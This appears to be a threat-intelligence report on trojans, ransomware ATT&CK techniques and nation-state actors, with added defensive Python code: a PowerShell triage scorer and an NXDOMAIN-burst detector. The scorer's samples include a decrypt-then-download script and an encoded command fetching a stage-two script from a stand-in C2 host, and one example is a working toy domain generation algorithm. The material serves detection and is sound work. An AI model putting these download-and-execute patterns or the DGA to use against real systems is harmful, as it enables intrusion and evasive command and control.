The Kryptik trojan targets victim machines via malicious installers. It then attempts to acquire admin rights to make registry modifications that allow it to execute each time a Windows machine boots. Kryptik can be persistent and, without appropriate visibility, can be difficult to detect, as it attempts to delete its executable file after running.

As noted by a threat profile from the New Jersey Cybersecurity and Communications Integration Cell (NJCCIC): "[The Kryptik trojan] queries the Windows registry for the .ini or .dat file paths. It also queries registry subkeys for the actual host, username and password related to the specific FTP client application. Kryptik searches the registry, querying for both ftpIniName and InstallDir that hold the wcx_ftp.ini file. The trojan can recover many common FTP clients, email clients, file browsers and file manager programs. Kryptik also can update itself and remotely download new versions."[11]

Obfuse is a trojan designed to steal confidential data stored on a system. It is delivered through porn websites, free online games, peer-to-peer file sharing, misleading ads, free third-party software and spam email attachments. Difficult to detect and remove, Obfuse can disable antivirus software, redirect browsers, slow system speed, freeze programs and pay repeat visits after creating new malicious registry keys.
Emotet, a malware family that began as a banking trojan and now serves primarily as a loader for other criminal payloads, has been around since at least 2014. Attackers continue to leverage variants of Emotet and are becoming increasingly shrewd in the techniques they employ to deliver the malware onto a system. Researchers using managed hunting services observed a spike in adaptations of existing methods that leverage PowerShell. Attackers encrypted the URLs of the command and control (C2) systems used to host the second-stage payload, so the URLs appear neither in the document nor in the first-stage script.

Further, several attacks originated from phishing campaigns that leverage Microsoft Word documents with obfuscated VBA macros that launch PowerShell and use the ConvertTo-SecureString cmdlet, which in the later stages decrypts the C2 URL(s) and associated logic. ConvertTo-SecureString with a -Key argument is a built-in AES decryption routine: the attacker embeds the key and the encrypted string, recovers the plaintext through the .NET Marshal class and feeds it to a download-and-execute step, all without any custom cryptographic code that a scanner could recognize. This represents an evolution of current macro attack techniques; these cmdlets are not typically associated with phishing campaigns, which also makes their presence in a macro-launched script a strong detection signal.

A three-part Palo Alto Networks blog series focuses on static analysis of PowerShell scripts and a platform-independent Python script to carry out the task. The author studied approximately 5,000 PowerShell scripts and describes behavioral profiling, common obfuscation, methods of hiding data within PowerShell scripts and a scoring system to assess risk.

RECOMMENDATIONS

Install next-generation antivirus coupled with endpoint detection and response (EDR) and micro-segmentation to thwart malware attacks.
Implement techniques within the Microsoft environment such as Just Enough Administration (JEA) to allow delegated control.
Remove the older PowerShell 2.0 engine, which has been deprecated and which, when an attacker starts it with powershell.exe -Version 2, bypasses script block logging and the Antimalware Scan Interface (AMSI).
Enable PowerShell transcription logging and Script Block Logging (event ID 4104). Because script blocks are logged as they execute, the second-stage code that an attack like the one above passes to Invoke-Expression is captured even though it never touches disk.
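An added example of the indicator-and-score triage the sidebar describes, applied to the ConvertTo-SecureString pattern above. It is not the Palo Alto Networks script and not code from the report; the indicator weights, the threshold and the three sample scripts are assumptions and constructions of this example. The malicious sample imitates the decrypt-then-download shape described for Emotet but carries no real key, ciphertext or URL. The script also decodes -EncodedCommand arguments (UTF-16LE base64) and scores what they contain, since that is where such payloads usually hide on a command line.

```python
"""Static triage of PowerShell content, scored against a short indicator list.

Added example, not code from the Optiv report, Palo Alto Networks or VMware
Carbon Black: a minimal version of the indicator-and-score approach the
sidebar describes. Weights, the threshold and the three sample scripts are
assumptions/constructed; the malicious sample imitates the
ConvertTo-SecureString C2-decryption pattern described for Emotet but
contains no real key, ciphertext or URL.
"""
import base64
import binascii
import re
from dataclasses import dataclass, field

# (pattern, weight, description). PowerShell is case-insensitive, so every
# pattern is matched with re.IGNORECASE. Weights are illustrative only.
INDICATORS = [
    (r"ConvertTo-SecureString", 3, "SecureString used as a decryption primitive"),
    (r"SecureStringToBSTR|PtrToStringAuto|SecureStringToGlobalAllocUnicode", 3,
     "SecureString turned back into plaintext"),
    (r"\bIEX\b|Invoke-Expression", 3, "dynamic code execution"),
    (r"FromBase64String", 2, "base64-decoded payload"),
    (r"Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|Start-BitsTransfer", 2,
     "remote payload download"),
    (r"\[char\]\s*\d+|-join\b|\s-f\s", 1, "string-assembly obfuscation"),
    (r"-nop(?:rofile)?\b|-w(?:indowstyle)?\s+hidden|-executionpolicy\s+bypass", 1,
     "profile/window/policy evasion switches"),
]
THRESHOLD = 6
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
ENCODED_ARG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{8,})", re.IGNORECASE)


@dataclass
class Triage:
    score: int = 0
    findings: list = field(default_factory=list)  # (weight, description)
    layers: list = field(default_factory=list)    # decoded -EncodedCommand payloads


def encode_command(cmd):
    """Produce a -EncodedCommand argument as PowerShell expects it: UTF-16LE, base64."""
    return base64.b64encode(cmd.encode("utf-16-le")).decode("ascii")


def decode_command(blob):
    return base64.b64decode(blob).decode("utf-16-le", errors="replace")


def triage(script, depth=0, result=None):
    """Score one script. Encoded command lines are decoded and scored
    recursively (up to three layers) before the outer text is scanned, and
    the base64 blob itself is replaced so it cannot match a pattern by chance."""
    if result is None:
        result = Triage()

    def _decode(match):
        try:
            inner = decode_command(match.group(1))
        except (binascii.Error, ValueError):
            return match.group(0)
        result.layers.append(inner)
        result.score += 2
        result.findings.append((2, f"encoded command line (layer {len(result.layers)})"))
        if depth < 3:
            triage(inner, depth + 1, result)
        return match.group(0)[: match.start(1) - match.start()] + "<decoded>"

    script = ENCODED_ARG.sub(_decode, script)
    for pattern, weight, description in INDICATORS:
        if re.search(pattern, script, re.IGNORECASE):
            result.score += weight
            result.findings.append((weight, description))
    return result


def verdict(script):
    result = triage(script)
    return ("suspicious" if result.score >= THRESHOLD else "benign"), result


# Constructed samples (not real malware).
MALICIOUS = r"""
$k = [byte[]](1..16)
$s = ConvertTo-SecureString -String 'ENCRYPTED-C2-URL' -Key $k
$b = [Runtime.InteropServices.Marshal]::SecureStringToBSTR($s)
$u = [Runtime.InteropServices.Marshal]::PtrToStringAuto($b)
IEX (New-Object Net.WebClient).DownloadString($u)
"""
BENIGN = r"""
$running = Get-Service | Where-Object { $_.Status -eq 'Running' }
Write-Output ("Running services: " + ($running.Name -join ', '))
"""
ENCODED = "powershell.exe -NoP -W Hidden -enc " + encode_command(
    "IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/stage2.ps1')")

if __name__ == "__main__":
    for name, sample in (("malicious", MALICIOUS), ("benign", BENIGN), ("encoded", ENCODED)):
        label, result = verdict(sample)
        print(f"{name}: {label} (score {result.score})")
        for weight, description in result.findings:
            print(f"  +{weight} {description}")
```

Each indicator counts once per script regardless of how many times it appears, so a long administrative script with one `-join` is not penalized for its length, while the combination that matters here (a SecureString decrypt, a Marshal call to recover plaintext, and IEX over a download) scores well past the threshold. Run the same function over the 4104 script block events rather than over files on disk to see what actually executed.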
MALWARE: RANSOMWARE

Optiv's gTIC team (using the ThreatDNA platform) found that ransomware was an influential topic throughout the past year in circles outside of the information security industry. Numerous industry leaders and organizations saw a drastic increase in ransomware activity, as reported in the news and in incident response reports.

Many ransomware concepts can be explained by reviewing what is known about the MITRE ATT&CK® for Enterprise techniques used by most ransomware families. Knowing more about how ransomware works will help identify and address vulnerabilities.

Data encrypted for impact (ATT&CK T1486). Adversaries may encrypt data on target systems, or on large numbers of systems in a network, to interrupt the availability of system resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done to extract monetary compensation from a victim in exchange for decryption or a decryption key, or to render data permanently inaccessible in cases where the key is not saved or transmitted. In the case of ransomware, common user files like Microsoft Office documents, PDFs, images, videos, audio, text and source code files are typically encrypted. In some cases, adversaries may encrypt critical system files, disk partitions and the master boot record (MBR). To maximize the impact on the target organization, malware designed for encrypting data may have worm-like features to propagate across a network by leveraging other attack techniques like valid accounts.

Service stop (T1489). Threat actors may also stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services can inhibit or halt responses to an incident or aid the adversary's overall objective of causing damage to the environment. Adversaries may accomplish this by disabling individual services of high importance to an organization, such as MSExchangeIS, which makes Microsoft Exchange content inaccessible. In some cases, adversaries may stop or disable any or all services to render systems unusable. Services may not allow modification of their data stores while running, so adversaries stop services like Exchange and Microsoft SQL Server to unlock their data stores before destroying or encrypting them. A burst of service-stop commands (net stop, sc stop, taskkill) against database, backup and security services is therefore one of the most reliable pre-encryption signals.

Parent PID spoofing (T1134.004). Attackers can fake the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. New processes are normally recorded as children of the process that called for them, unless a different parent is explicitly specified. One way of explicitly assigning the PPID of a new process is via the CreateProcess API call, which accepts a PROC_THREAD_ATTRIBUTE_PARENT_PROCESS attribute (through an extended STARTUPINFOEX structure) naming the process to record as the parent. This functionality is used by Windows features such as user account control (UAC) to correctly set the PPID after a requested elevated process is spawned by SYSTEM (typically via svchost.exe or consent.exe) rather than in the current user context. Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual or potentially malicious parent-child process relationships, for example by spoofing the PPID of PowerShell or rundll32 so that the parent appears to be explorer.exe rather than the Office application that opened a spear-phishing attachment. These spoofing techniques can be executed via Visual Basic for Applications (VBA) scripting within a malicious Microsoft Office document or any code that can call the API. Because the spoofed relationship is what the kernel records, Sysmon and EDR process-creation events show the fake parent; detection has to rely on data beyond the parent field, such as process-access events (Sysmon event ID 10) showing the real creator opening the claimed parent with PROCESS_CREATE_PROCESS rights.

Explicitly assigning the PPID may also enable privilege escalation, given appropriate access rights to the parent process. For example, an adversary in a privileged user space, such as an administrator, may spawn a new process and assign the parent as a process running as SYSTEM (such as lsass.exe), causing the new process to be elevated via the inherited access token.

System shutdown/reboot (T1529). Threat actors can shut down or reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems contain commands to initiate a shutdown or reboot of a machine, and in some cases these commands may also be used against a remote computer. Shutting down or rebooting systems disrupts access to computer resources for legitimate users. Adversaries may attempt to shut down or reboot a system after impacting it in other ways, such as wiping disk structures or inhibiting system recovery, to hasten the intended effects on system availability.

Account access removal (T1531). Attackers also interrupt the availability of system resources by inhibiting access to accounts used by legitimate users. Accounts may be deleted, locked or manipulated (for example, by changing their passwords). Adversaries may subsequently log off and/or reboot machines to set malicious changes into place.

Domain generation algorithms (T1568.002). Adversaries commonly use domain generation algorithms (DGAs) to procedurally generate domain names for command and control communication, and for other uses such as malicious application distribution. DGAs drastically increase the difficulty for defenders to block, track or take over the command and control channel, as there can potentially be thousands of domains that malware can check for instructions. The operator, who knows the algorithm and its seed, registers only one or a few of the day's candidates; an infected host therefore produces a burst of lookups for names that do not resolve before it finds the live one, and that burst of NXDOMAIN responses is the behaviour defenders look for.
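An added example for the DGA technique discussed above; it is not code from the report or from MITRE ATT&CK. `toy_dga()` shows the attacker side, a date-seeded algorithm that gives malware and operator the same fresh list every day, and `detect_nxdomain_bursts()` shows the defender side, one client failing to resolve many distinct names within a minute. The seed, hosts, log format and thresholds are assumptions, and the resolver log is constructed here rather than captured.

```python
"""Toy domain generation algorithm and an NXDOMAIN-burst detector.

Added example, not from the Optiv report or MITRE ATT&CK. toy_dga() shows how
a date-seeded algorithm gives malware and operator the same fresh list every
day; detect_nxdomain_bursts() shows the defender-side signal, one client
failing to resolve many distinct names in a short interval. The seed, hosts,
log format and thresholds are assumptions, and the log is constructed here,
not captured from a real resolver.
"""
import hashlib
import math
from collections import Counter, defaultdict
from datetime import datetime, timedelta


def toy_dga(seed, day, count, tld="net"):
    """Derive `count` candidate domains from a shared secret and the date.

    The operator registers one or two of these shortly before they are
    needed; the bot walks the list until a name resolves."""
    names = []
    for i in range(count):
        digest = hashlib.sha256(f"{seed}|{day}|{i}".encode()).hexdigest()
        # Map each hex nibble to a letter a..p: a long, meaningless label.
        label = "".join(chr(ord("a") + int(c, 16)) for c in digest[:14])
        names.append(f"{label}.{tld}")
    return names


def label_entropy(qname):
    """Shannon entropy (bits/char) of the leftmost label. Useful for ranking
    the names inside a burst, not as a verdict on its own: long legitimate
    hostnames score high too."""
    label = qname.split(".")[0]
    n = len(label)
    return -sum(c / n * math.log2(c / n) for c in Counter(label).values())


def build_sample_log(seed="example-seed", day="2020-03-01"):
    """Constructed resolver log: `<ISO time> <client> <qname> <rcode>`.
    10.0.0.5 is infected and sweeps the day's list; 10.0.0.7 is clean
    apart from one typo."""
    t0 = datetime(2020, 3, 1, 10, 0, 0)
    names = toy_dga(seed, day, 31)
    lines = [f"{(t0 + timedelta(seconds=i)).isoformat()} 10.0.0.5 {n} NXDOMAIN"
             for i, n in enumerate(names[:30])]
    # The 31st name was registered by the operator: it resolves and the sweep stops.
    lines.append(f"{(t0 + timedelta(seconds=30)).isoformat()} 10.0.0.5 {names[30]} NOERROR")
    lines += [
        f"{(t0 + timedelta(seconds=5)).isoformat()} 10.0.0.7 www.example.com NOERROR",
        f"{(t0 + timedelta(seconds=9)).isoformat()} 10.0.0.7 cdn.example.org NOERROR",
        f"{(t0 + timedelta(seconds=12)).isoformat()} 10.0.0.7 wwww.example.com NXDOMAIN",
    ]
    return "\n".join(lines)


def detect_nxdomain_bursts(log_text, min_distinct=20):
    """Flag clients that got NXDOMAIN for `min_distinct` or more distinct
    names within one clock minute. Repeated failures for the same name
    (a typo retried) do not count."""
    buckets = defaultdict(set)  # (client, minute) -> distinct failed names
    for line in log_text.splitlines():
        ts, client, qname, rcode = line.split()
        if rcode == "NXDOMAIN":
            minute = datetime.fromisoformat(ts).replace(second=0, microsecond=0)
            buckets[(client, minute)].add(qname)
    flagged = {}
    for (client, minute), names in buckets.items():
        if len(names) >= min_distinct:
            # Report the burst with its most random-looking names first.
            ranked = sorted(names, key=label_entropy, reverse=True)
            flagged[client] = {"minute": minute.isoformat(), "count": len(names), "sample": ranked[:3]}
    return flagged


if __name__ == "__main__":
    for client, info in detect_nxdomain_bursts(build_sample_log()).items():
        print(f"{client}: {info['count']} distinct NXDOMAIN names at {info['minute']}, e.g. {info['sample']}")
```

Fixed one-minute buckets are deliberately simple; a burst that straddles a minute boundary is split across two buckets, so production rules use a sliding window or a longer bucket with a proportionally higher threshold. The one answered query from the infected host is the name worth sinkholing, since the operator chose to register it; block-listing the 30 failures achieves nothing because tomorrow's list is different.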
RECOMMENDATIONS

Consider implementing IT recovery plans that contain procedures for consistently testing data backups that can be used to restore critical data. A backup that has never been restored, or that is reachable with the same credentials the ransomware used for lateral movement, should not be counted as a backup.
Identify potentially malicious software and audit and/or block it by using application allow-listing (whitelisting) tools such as AppLocker or Windows Defender Application Control.
Research trusted sources for public releases of decryptor tools or keys to reverse the effects of ransomware. In some cases, the method to decrypt files affected by a ransomware campaign is released to the public, for example through the No More Ransom project.
Hybrid Threat Actors

Hybrid threat actors present unique challenges because their classification is not always rigid. Common classes of hybrid threat actors include nation-states, cybercriminals, hacktivists and others described below. These actors may masquerade as a certain type to hide their true agendas, or they may belong to two or more classes, switching between them as their priorities change.
NATION-STATES

Nation-state threat actors are often thought to possess resources and capabilities above and beyond the average threat actor. They have unique relationships to other types of threat actors, and they treat cyber-threat actors within their borders according to their own philosophy and law. Citizens in a country are subject to the laws, regulations and governance of the nation-state in which they reside. Similarly, nation-state threat actors are not excluded from the laws and regulations of their own countries and therefore cannot act with impunity.

Analysts from Optiv and Digital Shadows weigh in below on prominent nation-states that engage in cyber-threat activity and use their positions to integrate domestic, non-nation-state threat actors into their offensive cyber policies.

» China. China prefers to indoctrinate cyber-threat actors so they willingly support the state. Feelings of patriotism and common achievement drive actors to cooperate and follow nation-state direction. China instills, and to an extent enforces, a deep sense of loyalty to country through schooling and the military. Groups may be directly associated with the military (APT1/Comment Crew), or they attract and maintain followers and members (Honker Union) via an agenda that focuses on patriotism and duty to country. China's recurring Five-Year Plan, which lays out key and strategic-level objectives related to economic growth, global influence, investments and culture, directs and influences the sentiment and actions of domestic cyber operations. China maintains a robust cyber capability within both its intelligence service, the Ministry of State Security (MSS), and the People's Liberation Army.

» North Korea. The North Korean government maintains a firm grip over its domestic cyber-threat actors. Its efforts are aided by the state's indoctrination methods, so that technical skills are developed among those serving the government. When compared with other nation-states, North Korea's interests have had a greater focus on monetary gain, brought on by the country's economic isolation and the strict international sanctions imposed on it. In addition to financially motivated activity, North Korea also engages in destructive cyber activity against South Korean media and targets other foreign media institutions that have portrayed the North Korean regime in a negative light. These motives were highlighted in cyber attacks carried out against international banks and cryptocurrency exchanges that were linked to the North Korean state. North Korea has been linked to the infamous WannaCry attack in 2017. The Lazarus Group/HIDDEN COBRA, an advanced persistent threat group, has been linked to several high-profile cyber attacks including the 2014 Sony Pictures Entertainment breach as well as attacks against South Korean critical infrastructure and media/financial institutions.

Digital Shadows analysts found that the Lazarus Group was particularly active in 2019 and well known for conducting operations for financial gain to raise government revenue. This is unusual for nation-state groups, which typically are focused on espionage operations used to gather sensitive political and military information. The majority of Lazarus Group's attacks on cryptocurrency exchanges took place in Asia, South Korea in particular.
2019 STATE OF NATION THREAT ACTORS

» Russia allows cybercriminals to conduct their activities as long as they target entities outside of Russia's borders and accept cyber direction from state sources.
» North Korea has had a greater focus on monetary gain, brought on by the country's economic isolation and the strict international sanctions imposed on it.
» Iran actively cultivates and recruits non-nation-state actors.
» China maintains a robust cyber capability within both its intelligence service, the Ministry of State Security (MSS), and the People's Liberation Army.
Cryptocurrency-related organizations remained a popular target for Lazarus. In addition to targeting multiple established cryptocurrency exchanges, the group was linked to an operation that promoted a fake cryptocurrency trading program which installed a backdoor on a victim's device when downloaded. Lazarus also conducted more traditional espionage operations. For example, the group was linked to an operation targeting one of India's nuclear power plants, Kudankulam Nuclear Power Plant (KNPP), in October 2019; the Dtrack trojan used in the attack was developed by the group. Although Windows remains the target operating system of choice for most threat actors, a notable trend was Lazarus' targeting of macOS (Mac OS X) systems. According to Digital Shadows research, South Korean macOS users were targeted through macro-embedded documents that would go on to execute a malicious PowerShell script. Lazarus often targe

ted both Windows and macOS users in the same operation, with separate infection procedures for each platform.

» Iran. Iranian nation-state actors actively cultivate and recruit non-nation-state actors in addition to continually building out their paramilitary cyber units such as APT33 and OilRig. Many Iranian threat actors carry out their activities on self-driven initiative as well as under suspected guidance from Iranian government and military organizations. Hacktivist groups, whose members sometimes have loose ties to higher education and military institutions, often are driven by the hope and expectation of being rewarded or recruited by special units within Iran's military and paramilitary groups that are involved in information security and cyber activity. The Basij, a volunteer corps, recruits for various domestic and national-level security initiatives, including cyber operations.

Reporting suggests that by late 2018, Iranian government officials took a stricter stance on the country's independent actors to bring offensive cyber operations under tighter government control and guidance. Throughout 2019, there was a notable increase in aggressive Iranian activity that further degraded relations between Iran and the West. Iranian state-linked hacker groups remained focused on conducting disruptive cyber attacks and spreading disinformation and pro-Iranian propaganda.[12] It is uncertain what the long-term response from Iranian groups will be in light of the strike that killed Islamic Revolutionary Guard Corps (IRGC) commander General Qasem Soleimani in January 2020.

MuddyWater, an Iranian state-associated threat actor, was most active in the first half of 2019. But throughout the year, the group used many new or previously unobserved tools to conduct espionage operations targeting various sectors and regions, including the Middle East, Asia, Europe and North America. One campaign used a previously unseen PowerShell-based backdoor called POWERSTATS v3 to target a university in Jordan and a government entity in Turkey. The multi-staged backdoor exfiltrated information and staged a second-stage attack by obtaining additional payloads from MuddyWater's command and control (C2) server. MuddyWater also expanded its targets to include Android devices. Mobile malware deployed by the group enabled it to gather information, including contact lists, call logs, SMS text messages and Android geolocation information, from an infected device.
In the second half of 2019, there was a notable reduction in public reporting on MuddyWater, although it is possible that campaigns occurred in the second half of the year but were not reported. Similar to reporting of APT34 activity, a Telegram user leaked information on the threat actor in May 2019, including images of both MuddyWater C2 server source code and the back end of the C2 servers. Given the sophistication of the group, it is unlikely that this would have severely disrupted its operations. It is more likely that the lack of reporting was caused by reporting biases: cyber-espionage campaigns often are reported in retrospect, or not reported until many months or years after they take place.

» Russia. The Russian state controls and coordinates cyber-threat activity with its non-nation-state actors via coercion. Cybercriminals are allowed to conduct their activities as long as they target entities outside of Russia's borders and accept cyber direction from state sources. Failure to do so can result in criminal prosecution. Russia is suspected of repurposing domestic hackers and threat actors that are embroiled in legal issues stemming from past cyber activities. These actors may be leveraged by government security and/or intelligence bureaus to carry out activities that benefit the state's agenda.

MuddyWater

In 2019, the Iranian state-associated threat actor MuddyWater targeted government and telecommunication organizations in the countries surrounding Iran. Phishing emails sent to targets contained Word documents that, once opened, displayed an error message to prompt a target into downloading a file. If a user proceeded, the malicious file established a connection with a C2 server that had links to previous MuddyWater attacks. The file exploited CVE-2017-0199 (a remote code execution flaw in the way Microsoft Office handles OLE objects, patched in April 2017 and previously exploited by the Iranian state-associated threat actor APT34) and ran a PowerShell script. The script obtained and exfiltrated information about the compromised system to the MuddyWater C2 server. The group also deployed additional, although unspecified, payloads onto compromised systems.

Because CVE-2017-0199 was used previously by APT34, it is possible that the two threat actors are collaborating, as Iranian state-associated groups are known to share infrastructure. Telecommunication organizations are an attractive target for espionage operations because they are part of a country's critical infrastructure and form critical nodes in a country's network. By gaining access to telecommunication organizations, a threat actor increases its ability to intercept and collect network traffic within a target country.